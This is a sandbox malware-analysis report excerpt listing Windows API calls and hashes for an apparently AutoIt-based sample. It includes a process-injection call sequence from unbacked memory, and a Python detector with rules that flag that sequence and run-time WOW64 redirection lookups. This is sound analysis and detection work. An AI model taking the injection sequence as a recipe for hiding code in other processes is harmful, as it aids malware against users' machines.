                                                                      • Opcode Fuzzy Hash: a856ad0e9ce1f173ac098b56388bb856459f0e8e6770235707b236350592e9b7
                                                                      • Instruction Fuzzy Hash: D2F0C23494060DB78B00BA65E84AC9E7B6CBE40310B704535BE2896592EF71DB6AD990
                                                                      APIs
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C21BF4
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C21BFC
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C21C07
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C21C12
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C21C1A
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C21C22
                                                                        • Part of subcall function 00C21B4A: RegisterWindowMessageW.USER32(00000004,?,00C212C4), ref: 00C21BA2
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C2136A
                                                                      • OleInitialize.OLE32 ref: 00C21388
                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00C624AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID:
                                                                      • API String ID: 1986988660-0
                                                                      • Opcode ID: 347a1ac9f7a65ff812de16e5dff176074de5b15de981ef8cb142fd9a46e08bf2
                                                                      • Instruction ID: 9593dc22fbdba46e8d0597eedd62f356b6cb5ee8a432d188450cea0b16101e9a
                                                                      • Opcode Fuzzy Hash: 347a1ac9f7a65ff812de16e5dff176074de5b15de981ef8cb142fd9a46e08bf2
                                                                      • Instruction Fuzzy Hash: 3071ABB4911244CFC784EF7AA9457BD3AE0FB9839475D822AED0ACB2A1EB314444DF43
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00C585CC,?,00CE8CC8,0000000C), ref: 00C58704
                                                                      • GetLastError.KERNEL32(?,00C585CC,?,00CE8CC8,0000000C), ref: 00C5870E
                                                                      • __dosmaperr.LIBCMT ref: 00C58739
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2583163307-0
                                                                      • Opcode ID: bf1ec7d8455da0d6f24934c963950affb11eb7b4a6fa363925c5c51caef6b8ae
                                                                      • Instruction ID: e021187d1d5b25a395236bfb7b996fd7896776822e4b03f7f978691c658d6199
                                                                      • Opcode Fuzzy Hash: bf1ec7d8455da0d6f24934c963950affb11eb7b4a6fa363925c5c51caef6b8ae
                                                                      • Instruction Fuzzy Hash: 9D016B3AA1562017D3606234A84577E27494F91776F390219FC28AB0E2DEA08DCDD15C
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00C317F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: 4ab5bf44efd3aa0a4c0941f5057fcdd7b84b18738fe3f498843704622faf8d43
                                                                      • Instruction ID: 8111a31a317eb38b8682992be1538004ce3a1d4f12ba557ef8981db7281538b8
                                                                      • Opcode Fuzzy Hash: 4ab5bf44efd3aa0a4c0941f5057fcdd7b84b18738fe3f498843704622faf8d43
                                                                      • Instruction Fuzzy Hash: 2F228A706183019FC714DF25C484B2ABBF1BF89314F28892DF89A8B3A1D731E945DB92
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00C62C8C
                                                                        • Part of subcall function 00C23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C23A97,?,?,00C22E7F,?,?,?,00000000), ref: 00C23AC2
                                                                        • Part of subcall function 00C22DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C22DC4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: X
                                                                      • API String ID: 779396738-3081909835
                                                                      • Opcode ID: 64a04eb7f8ff782a03f9fc8ee0c760b47b2651a84dd99222002d438ffcd5b09a
                                                                      • Instruction ID: 2da9e425c9c4dced4351ae37b17c109e18fc932f88031d25f5fe49cbc280c60f
                                                                      • Opcode Fuzzy Hash: 64a04eb7f8ff782a03f9fc8ee0c760b47b2651a84dd99222002d438ffcd5b09a
                                                                      • Instruction Fuzzy Hash: D321D570A102A8AFDF11EF94D845BEE7BFCAF58314F004059E405B7241DBB85A49DFA1
                                                                      APIs
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C23908
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 64e4049668ef0b82e5e8018917ffe63086de287c865caaa2ef3953401f6b74e3
                                                                      • Instruction ID: 8d2c3f0d6f85074824b9041dd24e3defddfd1863171f71091c73a5c1d3aef583
                                                                      • Opcode Fuzzy Hash: 64e4049668ef0b82e5e8018917ffe63086de287c865caaa2ef3953401f6b74e3
                                                                      • Instruction Fuzzy Hash: 7A31C370604351CFD320DF25D8847ABBBF8FB49318F00092EF99987690E775AA48CB52
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C2949C,?,00008000), ref: 00C25773
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00C2949C,?,00008000), ref: 00C64052
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 76d8491b72029b199921f976ae50418b3f3b152dfc95ba4edfdaa87307d01e3e
                                                                      • Instruction ID: 8cf9f52728bac43093e61109a2cec3822166144a1c9c821a42fd074bbe3cde25
                                                                      • Opcode Fuzzy Hash: 76d8491b72029b199921f976ae50418b3f3b152dfc95ba4edfdaa87307d01e3e
                                                                      • Instruction Fuzzy Hash: 8C017931185335BAE7315A2ADC4EF9B7F54DF06B70F148310BA6C6A1E0C7B45554CB90
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00C2BB4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: b84b9d549ff5c63ec3156de2bd2fec956217693ee0f220c3f331bb9bec228e16
                                                                      • Instruction ID: ab4a8cdceb332bb6aa255710e91920d7010dcdd4d0ec3649b7f875bccb5ee085
                                                                      • Opcode Fuzzy Hash: b84b9d549ff5c63ec3156de2bd2fec956217693ee0f220c3f331bb9bec228e16
                                                                      • Instruction Fuzzy Hash: 1C32DF75A00219DFCB20CF54D894BBEB7B9FF44300F248059E929AB6A1C774EE81DB91
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0314B60B
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0314B6A1
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0314B6C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                      • Instruction ID: 763d015e8792f60134aa4ea1ea522c9b1d76899a80b0d72d02a014e4fbbab9dc
                                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                      • Instruction Fuzzy Hash: 8712BE24E18658C7EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4E85CF5A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString
                                                                      • String ID:
                                                                      • API String ID: 2948472770-0
                                                                      • Opcode ID: 1835030a01636043d3e092c9db19c5bf53e88e8ca28b903e8a380170f3bec27f
                                                                      • Instruction ID: c7531d67b8b860bc075127bf9683ef1e780af8b4f1128c2dd6a2a522d8b7eddf
                                                                      • Opcode Fuzzy Hash: 1835030a01636043d3e092c9db19c5bf53e88e8ca28b903e8a380170f3bec27f
                                                                      • Instruction Fuzzy Hash: A6D17C74A0420AEFCF14EF98D8819EEBBB5FF49314F144159E915AB291DB30AE81DF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 792afdb8bdccbfaeee00aced54de734b35e94a4388f686a32aac7dae50a00e63
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 6C31F574A10109DBC728CF59E484969F7B1FF49300F249AA9E81ACB655D731EEC2CBC0
                                                                      APIs
                                                                        • Part of subcall function 00C24E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E9C
                                                                        • Part of subcall function 00C24E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C24EAE
                                                                        • Part of subcall function 00C24E90: FreeLibrary.KERNEL32(00000000,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24EC0
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24EFD
                                                                        • Part of subcall function 00C24E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C63CDE,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E62
                                                                        • Part of subcall function 00C24E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C24E74
                                                                        • Part of subcall function 00C24E59: FreeLibrary.KERNEL32(00000000,?,?,00C63CDE,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E87
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: 292f6051b73d064ef961f11fd8c5d63d1d35175e87cb16c144b6b9fcb6dfcbeb
                                                                      • Instruction ID: d213282ec0657e17a581f3c94821a371a105d5831366b9f8aedcd1bca775d8a7
                                                                      • Opcode Fuzzy Hash: 292f6051b73d064ef961f11fd8c5d63d1d35175e87cb16c144b6b9fcb6dfcbeb
                                                                      • Instruction Fuzzy Hash: 36110A32610215ABDF28FFA4ED42FAD77A5AF90710F10442DF542A65C1DEB09E15AB50
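Added example, not Joe Sandbox or AutoIt code: a parser for the per-function "APIs" listings in this report, with two rules run over the parsed entries. The first rule flags a function whose memory dump is not backed by a mapped PE image ("based on PE: false", here the region at offset 03149000) and that combines process creation, thread-context access and cross-process memory access, as the CreateProcessW / Wow64GetThreadContext / ReadProcessMemory entry above does (the 00010007 passed to Wow64GetThreadContext is CONTEXT_FULL for a 32-bit context). The second flags GetProcAddress resolving the WOW64 file-system redirection pair at run time, as the LoadLibraryA / GetProcAddress entry above does. SAMPLE is copied from three function entries on this page; the rule names, the alternative API names listed in INJECTION_STAGES beyond the three the report shows, and the choice of "Instruction Fuzzy Hash" as the entry boundary are assumptions.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and flag two patterns.

Added example for this report, not Joe Sandbox or AutoIt code. SAMPLE is
copied from three entries in the report; rule names, the extra API names in
INJECTION_STAGES and the entry boundary (END_MARK) are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Matches lines such as
#   • CreateProcessW.KERNELBASE(?,00000000), ref: 0314B60B
#   • __dosmaperr.LIBCMT ref: 00C58739
#   • Part of subcall function 00C24E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C24EAE
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
PE_RE = re.compile(r"based on PE:\s*(?P<pe>true|false)")
END_MARK = "• Instruction Fuzzy Hash:"   # last line of each entry (assumption)


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str]   # subcall function address, if the call is nested


@dataclass
class Entry:
    calls: List[ApiCall] = field(default_factory=list)
    pe_backed: Optional[bool] = None   # None: no 'Source File' line seen


def parse_entries(text: str) -> List[Entry]:
    entries, cur = [], Entry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.calls.append(ApiCall(m["func"], m["module"], args, m["ref"], m["caller"]))
            continue
        p = PE_RE.search(line)
        if p:
            cur.pe_backed = p["pe"] == "true"
            continue
        if END_MARK in line:
            entries.append(cur)
            cur = Entry()
    if cur.calls or cur.pe_backed is not None:
        entries.append(cur)
    return entries


# Thread-context injection needs all three stages. The report shows one API per
# stage; the other names are the usual alternatives (assumption).
INJECTION_STAGES = {
    "create": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"Wow64GetThreadContext", "GetThreadContext",
                "Wow64SetThreadContext", "SetThreadContext"},
    "memory": {"ReadProcessMemory", "WriteProcessMemory",
               "NtReadVirtualMemory", "NtWriteVirtualMemory"},
}
WOW64_FS = {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection"}


def find_injection(entry: Entry):
    """All three stages present in code that no mapped PE image backs."""
    names = {c.func for c in entry.calls}
    hit = {stage: sorted(names & apis) for stage, apis in INJECTION_STAGES.items()}
    if entry.pe_backed is False and all(hit.values()):
        watched = set().union(*INJECTION_STAGES.values())
        return {"rule": "injection_from_unbacked_memory", **hit,
                "refs": [c.ref for c in entry.calls if c.func in watched]}
    return None


def find_dynamic_wow64(entry: Entry):
    """GetProcAddress resolving the WOW64 FS-redirection pair at run time."""
    hits = [(c.caller or c.ref, a) for c in entry.calls
            if c.func == "GetProcAddress" for a in c.args if a in WOW64_FS]
    return {"rule": "dynamic_wow64_fs_redirection", "resolved": hits} if hits else None


def scan(text: str):
    findings = []
    for i, entry in enumerate(parse_entries(text)):
        for rule in (find_injection, find_dynamic_wow64):
            result = rule(entry)
            if result:
                findings.append({"entry": i, **result})
    return findings


# Constructed input: three entries copied verbatim from this report.
SAMPLE = """\
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,00C585CC,?,00CE8CC8,0000000C), ref: 00C58704
• GetLastError.KERNEL32(?,00C585CC,?,00CE8CC8,0000000C), ref: 00C5870E
• __dosmaperr.LIBCMT ref: 00C58739
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Instruction Fuzzy Hash: 9D016B3AA1562017D3606234A84577E27494F91776F390219FC28AB0E2DEA08DCDD15C
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0314B60B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0314B6A1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0314B6C3
• Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
• Instruction Fuzzy Hash: 8712BE24E18658C7EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4E85CF5A
APIs
  • Part of subcall function 00C24E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E9C
  • Part of subcall function 00C24E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C24EAE
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24EFD
  • Part of subcall function 00C24E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C24E74
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Instruction Fuzzy Hash: 36110A32610215ABDF28FFA4ED42FAD77A5AF90710F10442DF542A65C1DEB09E15AB50
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The "based on PE: false" check is what separates the injection entry from the rest of the listing: the same three APIs called from the AutoIt runtime's own image would be ordinary process management, but called from a region that no loaded module backs they belong to an unpacked payload. The second rule deliberately keys on the GetProcAddress argument rather than on the import table, because the report shows the redirection functions being resolved by name after LoadLibraryA("kernel32.dll") and never appearing as static imports.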
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: ec398097ad0c7ba83b339ba374d1066c59cadeabb0a6d4047352af98725c41a3
                                                                      • Instruction ID: f30923892979071522c2cd49a84e7f7afa625e00861493c81887e04a8d036fd9
                                                                      • Opcode Fuzzy Hash: ec398097ad0c7ba83b339ba374d1066c59cadeabb0a6d4047352af98725c41a3
                                                                      • Instruction Fuzzy Hash: E411487590410AAFCB05DF58E940A9F7BF9EF48301F104059FC09AB312DB30DA15CBA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                      • Instruction ID: 1577ce8737c6c50ce1caede9ddf87ea36775f56c513e9e696c3cfbb4b33cc94a
                                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                      • Instruction Fuzzy Hash: D3F0F436510A1896C7313A7A9C05BDA339CBF62336F120715F825A22D2CF74994AA6A9
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID:
                                                                      • API String ID: 176396367-0
                                                                      • Opcode ID: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                                      • Instruction ID: 67576484f1303991905cdfabb0e2f7c2589361c3a41bf117e9bec4690b38e85c
                                                                      • Opcode Fuzzy Hash: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                                      • Instruction Fuzzy Hash: 44F0C8B36006116ED7149F29D806BA7BB98EF44760F10852EF619CB2D1DB31E51097A0
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
